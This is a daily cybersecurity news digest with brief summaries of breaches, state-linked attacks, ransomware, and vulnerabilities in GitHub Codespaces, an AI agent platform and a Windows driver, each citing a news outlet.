In today’s cybersecurity news…
Substack admits data breach
Substack is notifying users of a data breach after attackers accessed email addresses, phone numbers, and internal metadata back in October. Substack CEO Chris Best said the issue was only discovered this week, and there’s no evidence that passwords or financial data were accessed. A threat actor has since posted a database with about 697,000 records online. Substack says it’s fixed the flaw and is warning users about potential phishing. (BleepingComputer)
Russian attacks target Winter Olympics
Italy’s foreign minister says cyberattacks “of Russian origin” have targeted foreign ministry sites and infrastructure linked to the Milano Cortina Winter Olympics, including hotels, though officials say the attacks were blocked. No details were given on whether the activity was state-backed. The warning comes as the UK urges organizations not to underestimate pro-Russia hacktivists, and as Cloudflare’s CEO threatens to pull free services for the Games after Italy fined the company €14 million for anti-piracy violations. (The Register)
GitHub Codespaces enable RCE
Orca Security says attackers can achieve remote code execution in GitHub Codespaces by tricking developers into opening a malicious repository or pull request. The researchers found that default configuration files can automatically run commands on startup, letting attackers steal tokens, access secrets, and potentially move laterally across enterprise environments. Orca warns developers should treat repository-supplied configs as untrusted. (Infosecurity Magazine)
Russia-used Starlink terminals now deactivated
Ukraine says its new Starlink whitelist system is now stopping Russian military use of the satellite internet network and has already cut off access for unverified terminals, following the impact of yesterday’s move to disconnect unauthorized devices. Approved terminals on the whitelist are operational, but Russian ones have been blocked, and verified lists are being updated daily as part of the ongoing registration process. (Reuters)
Huge thanks to our sponsor, Strike48
Cyberespionage op targets governments worldwide
Palo Alto Networks’ Unit 42 says an Asia-based cyberespionage group breached at least 37 governments and conducted reconnaissance in 155 countries, calling it one of the most widespread state-linked compromises since SolarWinds. Telecom firms, police, ministries, and even a parliament were accessed. Researchers say the campaign focused on espionage and data theft, using phishing and common tools like Cobalt Strike across varied targets. (The Record)
Conpet discloses cyberattack
Romania’s national oil pipeline operator Conpet says a cyberattack disrupted its corporate IT systems and knocked its website offline, but didn’t affect operational technology or fuel transport. The company runs nearly 4,000 kilometers of pipelines. The Qilin ransomware group claims responsibility, saying it stole about 1TB of data and leaked sample documents as proof. (BleepingComputer)
OpenClaw may reveal big personal info
The OpenClaw AI agent platform may have prompt-injection attacks that could let hackers backdoor a user’s machine, steal files, or deploy ransomware. Snyk found that 283 of around 4,000 skills in the ClawHub marketplace exposed sensitive data like API keys, passwords, and credit card numbers. Zenity also reported that attackers could use indirect prompt injection through integrated apps to gain remote control of systems and exfiltrate data. (The Register)
EnCase driver weaponized
Huntress researchers say attackers are abusing an old, revoked Windows driver from the EnCase forensic tool to disable security software in “bring-your-own-vulnerable-driver” attacks. The team found Windows still loads the driver because of legacy signing rules that allow pre-2015 certificates, even if they’re expired or revoked. (Dark Reading)